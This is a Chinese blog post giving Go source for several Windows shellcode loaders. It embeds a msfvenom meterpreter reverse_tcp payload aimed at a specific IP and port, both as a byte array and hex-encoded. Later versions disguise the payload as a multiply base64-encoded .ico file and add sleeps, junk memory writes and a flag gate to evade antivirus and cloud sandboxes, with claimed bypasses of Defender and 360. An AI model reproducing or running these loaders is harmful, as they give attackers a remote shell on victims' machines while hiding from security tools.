Go实现shellcode加载器

发布于 2021-10-10  440 次阅读


GO实现shellcode加载器

先上代码:

package main

import (
	"io/ioutil"
	"os"
	"syscall"
	"unsafe"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

var (
	kernel32      = syscall.MustLoadDLL("kernel32.dll") 	//调用kernel32.dll
	ntdll         = syscall.MustLoadDLL("ntdll.dll")    	//调用ntdll.dll
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc") 	//使用kernel32.dll调用ViretualAlloc函数
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")  	//使用ntdll调用RtCopyMemory函数
	shellcode_buf = []byte{
		0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xcc, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
		0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x51, 0x48, 0x8b,
		0x52, 0x20, 0x56, 0x4d, 0x31, 0xc9, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a,
		0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
		0x01, 0xc1, 0xe2, 0xed, 0x52, 0x48, 0x8b, 0x52, 0x20, 0x41, 0x51, 0x8b, 0x42, 0x3c, 0x48,
		0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x0f, 0x85, 0x72, 0x00, 0x00, 0x00, 0x8b,
		0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x44,
		0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0x8b, 0x48, 0x18, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x4d,
		0x31, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x48, 0x31, 0xc0, 0x41, 0xc1, 0xc9,
		0x0d, 0xac, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45,
		0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b,
		0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01,
		0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48,
		0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9,
		0x4b, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xbe, 0x77, 0x73, 0x32, 0x5f, 0x33, 0x32, 0x00, 0x00,
		0x41, 0x56, 0x49, 0x89, 0xe6, 0x48, 0x81, 0xec, 0xa0, 0x01, 0x00, 0x00, 0x49, 0x89, 0xe5,
		0x49, 0xbc, 0x02, 0x00, 0x0d, 0x05, 0x01, 0x75, 0x2f, 0xe7, 0x41, 0x54, 0x49, 0x89, 0xe4,
		0x4c, 0x89, 0xf1, 0x41, 0xba, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x4c, 0x89, 0xea, 0x68,
		0x01, 0x01, 0x00, 0x00, 0x59, 0x41, 0xba, 0x29, 0x80, 0x6b, 0x00, 0xff, 0xd5, 0x6a, 0x0a,
		0x41, 0x5e, 0x50, 0x50, 0x4d, 0x31, 0xc9, 0x4d, 0x31, 0xc0, 0x48, 0xff, 0xc0, 0x48, 0x89,
		0xc2, 0x48, 0xff, 0xc0, 0x48, 0x89, 0xc1, 0x41, 0xba, 0xea, 0x0f, 0xdf, 0xe0, 0xff, 0xd5,
		0x48, 0x89, 0xc7, 0x6a, 0x10, 0x41, 0x58, 0x4c, 0x89, 0xe2, 0x48, 0x89, 0xf9, 0x41, 0xba,
		0x99, 0xa5, 0x74, 0x61, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0x0a, 0x49, 0xff, 0xce, 0x75, 0xe5,
		0xe8, 0x93, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0xe2, 0x4d, 0x31, 0xc9,
		0x6a, 0x04, 0x41, 0x58, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8, 0x5f, 0xff, 0xd5,
		0x83, 0xf8, 0x00, 0x7e, 0x55, 0x48, 0x83, 0xc4, 0x20, 0x5e, 0x89, 0xf6, 0x6a, 0x40, 0x41,
		0x59, 0x68, 0x00, 0x10, 0x00, 0x00, 0x41, 0x58, 0x48, 0x89, 0xf2, 0x48, 0x31, 0xc9, 0x41,
		0xba, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x48, 0x89, 0xc3, 0x49, 0x89, 0xc7, 0x4d, 0x31,
		0xc9, 0x49, 0x89, 0xf0, 0x48, 0x89, 0xda, 0x48, 0x89, 0xf9, 0x41, 0xba, 0x02, 0xd9, 0xc8,
		0x5f, 0xff, 0xd5, 0x83, 0xf8, 0x00, 0x7d, 0x28, 0x58, 0x41, 0x57, 0x59, 0x68, 0x00, 0x40,
		0x00, 0x00, 0x41, 0x58, 0x6a, 0x00, 0x5a, 0x41, 0xba, 0x0b, 0x2f, 0x0f, 0x30, 0xff, 0xd5,
		0x57, 0x59, 0x41, 0xba, 0x75, 0x6e, 0x4d, 0x61, 0xff, 0xd5, 0x49, 0xff, 0xce, 0xe9, 0x3c,
		0xff, 0xff, 0xff, 0x48, 0x01, 0xc3, 0x48, 0x29, 0xc6, 0x48, 0x85, 0xf6, 0x75, 0xb4, 0x41,
		0xff, 0xe7, 0x58, 0x6a, 0x00, 0x59, 0x49, 0xc7, 0xc2, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5,
	} //msfvenom生成的shellcode
)

func checkErr(err error) { 
	if err != nil { 			//如果内存调用出现错误,可以报出
		if err.Error() != "The operation completed successfully." { //如果调用dll系统发出警告,但是程序运行成功,则不进行警报
			println(err.Error()) //报出具体错误
			os.Exit(1)
		}
	}
}

func main() {
	shellcode := shellcode_buf
	if len(os.Args) > 1 {
		shellcodeFileData, err := ioutil.ReadFile(os.Args[1])
		checkErr(err)
		shellcode = shellcodeFileData
	}
	
    //调用VirtualAlloc为shellcode申请一块内存
	addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
		if addr == 0 {
		checkErr(err)
	}
    
    //调用RtlCopyMemory来将shellcode加载进内存当中
	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
	checkErr(err)
    
    //syscall来运行shellcode
	syscall.Syscall(addr, 0, 0, 0, 0)
}


这里的shellcode是使用msf生成的:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=1.117.47.231 lport=3333 -f c

再用SublimeText,ctrl+h替换掉引号,吧\x改成0x即可。

成功上线

隐藏黑框可以在编译时使用命令:

go build -ldflags="-H windowsgui -w -s" ms.go

bypass:

windowsdefender

360

360极速版

具体的代码原理都在代码注释中注明,但是查杀率较高,这里尝试一下分离免杀,将shellcode和加载器分离开

test1.go

package main

import (
	"encoding/hex"
	"fmt"
	"io/ioutil"
	"os"
	"reflect"
	"syscall"
	"unsafe"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

var (
	kernel32      = syscall.MustLoadDLL("kernel32.dll")
	ntdll         = syscall.MustLoadDLL("ntdll.dll")
	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)

func Read2333() string {
	f, err := ioutil.ReadFile("1.txt")  //1.txt为我们需要加载的shellcode文件,这里可以使用其他格式的文件来进行混淆
	if err != nil {
		fmt.Println("read fail", err)
	}
	return string(f)
}

func checkErr(err error) {
	if err != nil {
		if err.Error() != "The operation completed successfully." {
			println(err.Error())
			os.Exit(1)
		}
	}
}

func main() {
	b := Read2333()
	fmt.Println(b)
	shellcode, err := hex.DecodeString(b)
	if err != nil {
		checkErr(err)
	}
	if len(os.Args) > 1 {
		shellcodeFileData, err := ioutil.ReadFile(os.Args[1])
		checkErr(err)
		shellcode = shellcodeFileData
	}
	fmt.Println(shellcode)
	fmt.Println(reflect.TypeOf(shellcode))
	addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	if addr == 0 {
		checkErr(err)
	}
	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), (uintptr)(len(shellcode)))
	checkErr(err)
	syscall.Syscall(addr, 0, 0, 0, 0)
}


1.txt

fc4883e4f0e8cc00000041514150524831d265488b5260488b521851488b5220564d31c9488b7250480fb74a4a4831c0ac3c617c022c2041c1c90d4101c1e2ed52488b522041518b423c4801d0668178180b020f85720000008b80880000004885c074674801d050448b40204901d08b4818e35648ffc94d31c9418b34884801d64831c041c1c90dac4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94bffffff5d49be7773325f3332000041564989e64881eca00100004989e549bc02000d0501752fe741544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd56a0a415e50504d31c94d31c048ffc04889c248ffc04889c141baea0fdfe0ffd54889c76a1041584c89e24889f941ba99a57461ffd585c0740a49ffce75e5e8930000004883ec104889e24d31c96a0441584889f941ba02d9c85fffd583f8007e554883c4205e89f66a404159680010000041584889f24831c941ba58a453e5ffd54889c34989c74d31c94989f04889da4889f941ba02d9c85fffd583f8007d2858415759680040000041586a005a41ba0b2f0f30ffd5575941ba756e4d61ffd549ffcee93cffffff4801c34829c64885f675b441ffe7586a005949c7c2f0b5a256ffd5

修改之后的vt查杀率:

微步沙箱:

查杀率还是有点高...


继续改进下:

package main

import (
	"encoding/base64"
	"encoding/hex"
	"flag"
	"fmt"
	"io/ioutil"
	"os"
	"syscall"
	"time"
	"unsafe"
)

const (
	MEM_COMMIT             = 0x1000
	MEM_RESERVE            = 0x2000
	PAGE_EXECUTE_READWRITE = 0x40
)

var (
	ke  = syscall.MustLoadDLL("kernel32.dll")
	nt  = syscall.MustLoadDLL("ntdll.dll")
	vac = ke.MustFindProc("VirtualAlloc")
	rt  = nt.MustFindProc("RtlCopyMemory")
)

func checkErr(err error) {
	if err != nil {
		if err.Error() != "The operation completed successfully." {
			println(err.Error())
			os.Exit(1)
		}
	}
}

func Read2333() string {
	f, err := ioutil.ReadFile("1.ico")
	if err != nil {
		fmt.Println("read fail", err)
	}
	return string(f)
}

func Base64DecodeString(str string) string {
	resBytes, _ := base64.StdEncoding.DecodeString(str)
	return string(resBytes)
}

var ms string

func main() {
	ms1 := flag.String("b", "tcp", "scan method")
	flag.Parse()
	fmt.Println(*ms1)
	ms = *ms1
	if ms == "udp" {
		var c string = "qweqwdsfqweqwqwswqqweqdqwdqwdwqeqrwqeqwQWRQW/.OPKDIJGIJWDOIAOSJIRGJOEKDOQIWOIJOGWEMPOSDPOOPGKWE[LWEPQKPOKEORKOPKPROKPOKOPQWKEPQOGOIMEKOMDMQWPODPOKOK3-021-04-34-3204O-02I059032JR0JI@JI3J3E02e"
		addr1, _, err := vac.Call(0, uintptr(len(c)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
		_, _, err = rt.Call(addr1, (uintptr)(unsafe.Pointer(&c)), uintptr(len(c)/2))
		time.Sleep(time.Second * 3)
		var b string = Read2333()
		deStrBytes := Base64DecodeString(b)
		for i := 0; i < 5; i++ {
			deStrBytes = Base64DecodeString(deStrBytes)
		}
		sc, err := hex.DecodeString(deStrBytes)
		time.Sleep(time.Second * 3)
		addr, _, err := vac.Call(0, uintptr(len(sc)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
		time.Sleep(time.Second * 1)
		if addr == 0 {
			checkErr(err)
		}
		_, _, err = rt.Call(addr, (uintptr)(unsafe.Pointer(&sc[0])), uintptr(len(sc)/2))
		time.Sleep(time.Second * 2)
		_, _, err = rt.Call(addr+uintptr(len(sc)/2), (uintptr)(unsafe.Pointer(&sc[len(sc)/2])), uintptr(len(sc)/2))
		time.Sleep(time.Second * 2)
		checkErr(err)
		time.Sleep(time.Second * 3)
		syscall.Syscall(addr, 0, 0, 0, 0)
	} else {
		fmt.Println("Hello,world!")
	}
}

1.ico

Vm10a01GVXlTblJXYmtwT1ZtMW9WbFpyV21GVlJsWnlXa2R3VGxKc1NsaFhhMXBoVkRGYWRHUjZTbFpXZWtJMFYxWmtTMVl5VGtsVmJHaHBWa1ZhYUZaR1ZsWk9Wa3BZVW10b2ExSlVWbFJWYlhoM1pXeFplVTFJYUZwV01IQllXVEJvVTFkSFNsVlNiV2hhVmpOb1IxUlZXbXRYUlRGV1pFZG9WMVpHV2tkWFYzUnJUa1pzVjFkcmFGVlhTRUpaV1ZSR1MxbFdVbGhqTTJoVFZqQldObGRyV25kVWJVcEhZMGhvVjFJelVsUlpiVEZYWTJzeFYxWnNaRmRTYTNCUVYxWmplRlJ0VVhoVldHUldZVE5TYjFSV2FFTmxSbXhXV1ROb1dsWXdjRmhaTUdoVFYwZEtWVkp0YUZwaE1WWTBXa1ZhYTFaV1JuSlBWazVUVFcxb05WWnJZM2hrTVdSeVRWVmFVRlpzV205YVYzaGhWVVpzYzFkc1pFOVNiVkphV1RCV1QyRldTblJrUkZaV1RWWktSRlpWV2xwbFJtUjBUMVpXYVZkRlNrMVhWbVI2WlVkT1YySkVXbE5pUlVwWVZXMTRkMlZzV1hoWk0yaFdUV3R3V0ZsVVRuTlZNa3BWVW1zNVlWWXphRmhVYTFwU1pERldjbVJIYkZOV1IzaEhWbFJHVTFJeGJGZFhhMmhvVTBWYVdWbHNVa2RVTVhCV1ZsUkdXRkpyTlZaVmJYTTFZVWRLUjFkVVJsZE5ibWhVV1cweFYxWnJOVmRoUm1ScFYwVkthRlpHWkRSV01EVlhXa2hLVm1KVlduQlZiRkp6VTFaYVNFMVhPVlZpVlhCWFZGVm9hMVpXWkVsUmJFNVZWbFpWZUZreFduZFRSMDVHVDFkc1YxWkdXalpXYWtaaFlURktjazFWWkdoTk1uaFVXV3hTUjFWR1ZuSldiR1JQWWtkU2VWWlhkREJoUjBZMlVteGFXbFpYVW5aV1J6RkhaRVpyZW1KR1ZsZFdhM0JJVmtaa2VrMVdTbGRVYkZaVFlYcFdjRlpzVWxka2JGbDVaRVpPYUdGNlJsZFViRnBYV1ZaSmVtRkhSbGRoTVZWNFdURmFVMlJIVGtoa1IyaG9aVzE0U2xadE1IaE9SbEp6VTJ0YVdHSnJOVlpaYkZKSFZURlNXR042Um10U2JFcGFXV3RrUjJGSFNrWldhbFpYVWpOU1ZGbHRjM2hXTWs1R1ZteG9WMUpVVm05WFZtUTBaREpKZUZWc2FFNVdWMUp3Vm14U1UwNVdXa2hOV0U1VlRXdGFlbGt3YUZOV1ZURklWV3hPVldKR1ZYaFZNRnBMWkVkT1IxRnNaRk5pU0VJMlZtdGtORlV5Um5SV2JHUnFVbXhhVmxaclZURlpWbXhZWkVWMGFsWnRVbnBYYTFVMVlVWmFWVlpyV2xaaVJrcElWa1JLUjJSR1ZuVlZiRlpwVW10d2FGWkdaSHBsUmtwWVVsaHdZVkp1UWs5WlZFWlhUVEZhUjJGSVpGTmhla1pZV1RCYVYyRkZNSHBSYXpsWFlXdEtXRlJzV210ak1WWnlVMnM1VTJKclNrcFdhMk40WWpGV1IxTnJXazlYUmtwWldWUktVMWRHYkZoamVrWlBZa1UxTUZwRlpFZFdNREZXVm1wT1YxSnNjRlJWYlhONFVqSktSMVpzWkdsV00yaFJWbTEwWVZNeVRYaFZiRnBXWWtWd2MxWnRNVFJsUmxWNVRWUlNXbFl3V25wWk1HaEhWbGRLU0ZWcmFGcFdSVVl6V2xaYWEyUkhSa2RqUm1SVFltdEpkMVpyV205a01WcHlUVmhLVDFOSGVGZFpiRkpIVlVaV2NsWnRSbXBpUjFKNVZsY3hNR0ZGTVZsUmExcFhUV3BGZDFaRVNrdFdiVTVKVTJ4V1YwMHdTbmxYVm1SNlRsWk9SMVZzVmxOaVZWcFlWV3hhV2sxR1drVlJiWFJXVFd0d1dGa3dXbGRYUjBwWVpVZEdZVll6YUdoWmVrWnJZekZXZFZOck5VNVNSM2hYVmxjd2VFMUdiRmhTYmxKYVpXdGFXVmxVU2xOVFJteFhWbFJHVjFZd1dUSlZNakZIVmpGS2NtTklhRmRTYldnelZtMHhWMk15VGtaaFJsWllVakpvVVZaWGRHRmtNazVIV2toU2FsSlVWbEJXYlRWRFYxWmFWMVZyVGxaU2JIQkhXVmh3UTFkR1duTlRiR2hhVm14VmVGWnNXbGRrUjFaSFVXeE9VMVpzYTNsV2FrWlRVekZaZVZKWVpFNVdWbHBZVm10V1MxVkdWbkZSYkZwT1VteEtWbFV5TVVkaFJURlpVV3hzVjAxcVJucFdSekZYWXpGS1dXSkdWbWhoTTBKVVZrZDRWazFXVGtkV2JGWlVZWHBzVDFsVVNqTmxiRnBIVjJ4T1dsWXdXa2haTUdoSFdWWkplbEZ0UmxwV00yaDVXa1JHVW1ReFZuTlhhelZUWWxob1dsWnNZM2hPUm1SeVRWaEtUbFpGTlZsV2JuQkhWakZ3VjFaVVJrOWlSVFZXVmtkek5WWXhTbGRXYWs1WFRXNVNjbFV5YzNoV01rNUpVbXhrYVZkRlNsRldWM0JEV1ZkU1IxcElVazVXYkhCUVZXMHhORlpzVlhoVmJHUlZUVlZzTkZVeU5VTlhSMHBIVTJ4U1dsWnNWWGRhVmxwaFpFZEtTRkp0YUdobGJGbzBWbXRhVTFNeFpISk5WbHBPVmtad1YxWnJWa3RWUm14WVRWWk9hVTFXU2pCWk1HUjNWR3N4V0dWR2JGZFNiRXBVVmtjeFIyUkhUalpTYkdocFYwVkthRlpHV2xabFJtUkhVMnhXVTJGNlZsUlVWVnAzWld4YVJWSnNUbXBoZWtaSFZHeFdiMWRHWkVsUmJFWlhZVEZWZUZscVJsTldWazV6V2tkc1UySllVVEZXVkVaVFVURnNWMU5ZYUdwVFJVcFdWbTE0UzFReFVsWlhibVJZVW0xU01GcFZaRWRoUjBwR1ZtcE9WMUo2UWpSV1YzTjRWbXM1Vmxac1ZtbFhSMmh2Vm0xMFlXTnRWbk5hU0VwV1lraENUMWxZY0ZkU2JGWlhWV3hPVlUxV2NFZFZiRkpIVjBkS1ZWSnNUbUZXYkZZMFdrVmFZVlpXU25KUFZUVnBVbFpaTVZacldtcGxSbFY1VW14YVRsWlhhRmRXYTFwaFZWWmFjbHBFVW1wU2JFb3hXVEJvVDJGR1NsVldibWhXVFZaS1dGWkhNVXRXTWtZMlVXeFdWMVl4U2xoV1IzUmhZekZhVjFKc2JHcFNNRnBVVlcwMVEwMUdXWGhYYkU1YVZqQmFlVlJzVW1GV1IwcFlZVVpDVlZZemFGaFViRnByVmpGd1IxcEhhRmRXUmxwS1ZsUkdVMUV4WkhSVGJGcFlZbXRLV1Zsc2FFTlZNVkp5VjI1T1QySkhVbHBaVlZVeFZUQXhWbU5JY0ZkTmJsSnlWVEp6ZUZKck9WZGhSbVJwVmpOb2IxWnRkRlpOVjA1WFdraEtZVkpVVm5OV2JGSkhVbXhzVmxwSVpGWlNhM0JKVmxjMVExWlhSWGhUYlVaaFZsWldORlJ0ZUU5WFYwWkdUMWQ0YVZORlNqUldhMlF3VlRKS2NrMVdXazVYUmtwVldXeG9RMkZHV25KWGEzUnFZa1pLVmxVeWVFdFViVXBJWlVob1YxWnRhSHBXTWpGSFkyc3hSVkZzYUZkU1dFSlJWMVpXVmsxV1NsZFdibEpwVWxSc1dGUldXbmRrYkZsNVRVaG9XR0Y2UmtoWmExcFhWbXhhUmxOck9WZGhhMXA2VkcxNFUxZEZNVlpQVjJ4WFlsaGplVlpYZUZOVU1WSjBVbTVPYVZKR2NGbFdhMVozVmtac1dHVklaRmRXYkVwYVYydFZNV0pIUmpaU1ZFcFhVak5vVkZaWGMzaGphekZYVm14V1dGSXphRkJYYkdRMFdWZE5lRnBJVWs1V1ZHeHdWV3hTVjJWR1dYbE5TR2hZWVhwR2VsbFVUbTlYUm1SSlVXMW9XbFpXY0hwYVJWcHJWbFpHYzFGc1RsTmhNVmw2Vm10YVlWVXlTbkpOVmxwT1ZteGFXRmxzVWtkVlJscHlWbTVLYTAxV1NuaFZNbmhyWVVVeFJXSkZXbFppUjJoNlZrUktSMlJIUmtsVmJGWllVMFZLVUZaSGVGWmxSVFZ6VTJ4V1UySlZXbGhWYWs1U1RXeGFTRTVZWkdoaVZscFlXVEJvVTFkR1drWmpSMFpoVmpOU2VWUldXbEpsUmxaelYyMTRVMVpHVlhsV2FrWlRWREZSZUZOcmFGWmlhM0JXV1d4b1ExbFdjRVZSVkZaWFZteGFWbFZYY3pWaFZscDBaRVJTVjFKRlNsUlpha3BMVWpKS1IyRkdhR2xXUlZwUlZsZDBhMkZ0VVhoVmJrcFdZa1Z3YzFscmFFTlNiRlY0Vld0a1dsWnJiRFJXYkZKSFYwWmFkRlZyWkZWV00wNDBXVEZhWVZkWFNraFNiR1JUVFd4R05sWnFTWGhrTVZsNVVtdGthbEpXV2xOWmJHaHZWVlphY1ZGWWFFOWlSMUo2VjJ0V2QxUnNXbFZTVkVwYVlUSk9ORlpFU2t0V01VcFZVbXhXYVZaRldtaFdSbFpoWXpBMWRGTnJhR3hTYTBwWVZXcE9VazFXV2tWUmJFNVVUV3R3UjFReFZtOVZNa3BaVVd4R1ZtRnJSWGhaTVZwcll6RndSbGR0ZUZOV1JsVjVWbGQ0YjJJeFVuTlhhMmhWWVd4YVZsbHNhRU5WTVZKeVZsUkdWMVpzY0ZaV1YzTTFWVEF4U0dSRVRsZFNSVXB5Vm1wS1MxSnJOVlZYYlVaVFRURktVRmRXWTNoVWJWWkhWV3hrVm1KRmNFOVZiRkpYWlVaYWMxVnJUbFZOYTNCWVZXeG9jMWRIUlhoVGJXaGFWbXhWZUZWc1drOVdWbEp6WTBkb2FHVnJTVEJXYTJRd1ZURldjazVWWkdwU2JGcGhXbGR6TVZsV2JGaGtSbHBPVW0xU1dGWlhNREZpUmxwMVVXeGFXR0ZyTlhKV01uTjRZekpPU0U5V1ZtbFNhM0JSVjFaU1FrMVdXbGhUYTJob1VtNUNXRlZ0ZEhkbFJsbDRWMjEwV0dGNlJrZFVWbFpYV1ZkV2NsZHJPVmRoYTBWNFdrVmFhMWRYVGtaWGF6Vk9Va1ZKTVZac1dtOWtNVkY0VjFob1dHSnNTbGxaYkdoRFVURlNWbGR1WkZOV2JIQldWVEo0ZDJGSFNraGtSRTVYVW5wV00xVjZTa3RXYXpGWlVteFNWMUpzY0ZKV2JYQkhVekpPVjFWWVpHRlNia0p6Vld4U1YxTldWWGhWYTA1YVZteHdSMVJzYUVkWFIwcFpVV3QwVlZac1ZqUlpNVnB6VG14S2RGSnNaRk5pUmxrd1ZtdFNRMVV4VlhsU2JGcFBWbGRvVjFsc2FHOWhSbHB5V2tVMWJHSkhVbmxXVjNSM1ZHc3hSVlpzV2xaaVJrcE1Wa1JLUzFZeFpIVlNiR2hwVWpGS1dWZFdVa2RrTWs1WFYyNVNhMUpVYkhOWmEyUXdUVEZhUlZKc1RsSmhla1o1VkZWb2MxWldaRWhoUlRsaFZqTm9lbFJyV210WFYwNUpWRzFvVjJKclNsZFdhMk40WkRGc1YxTllaRTVUU0VKWlZqQm9RMWxXY0ZkWGJrNVhWbXR3TUZwRlZUVldNVXAwWkhwQ1YxSnRhRE5WTWpGWFkyczFWbFp0YUd4aVJuQm9WMnhqZUZVeVRYaFZiazVoVW10d2NsUlZVbGRUVmxWNFZXdDBWV0pHY0VkV2JGSkRWbFprU1ZGc1pGVldNMDEzV2xaYVUyUkhSa1pQVms1VFlUTkNORlpyWkRSVk1rWjBWbXhrYWxKV1dsbFdhMVozVkRGc1dFMVhPV3BTYkVwWVZsZHpOV0ZHV25WUmExcFhWbnBGZDFaSGVHRlNhekZKWVVaV1YxSllRbEJXUm1SNlRsWk9SMVpzVmxWaVZWcFVWV3hTVjAxR1draGtSazVTVFd0YWVsbHJhRWRXUjBwWllVWkNWbUV4Y0VoVWJGcHJWMGRPUjFOck5WZFdSVmwzVmxSR1UxWXhWa2RYV0doVVltdGFWbFpzWkZOVlJteHlWMjVPVGsxVlNsWlVWVkYzVUZFOVBRPT0=

这里是将payload转换成字符串进行了6次的base64编码后存入1.ico,使用时读取、解码、转换为字符数组的形势,再分成两段压入内存。同时还加了很多sleep让程序休眠,可以更好的起到免杀的效果。前面还向内存中压入了一些无关紧要的字符串来达到混淆的效果。同时考虑到很多杀软都会将样本上传云沙箱运行分析其行为,这里引用了flag包,再连接前需要输入参数 -b udp 才能正常连接。


业精于勤,荒于嬉;行成于思,毁于随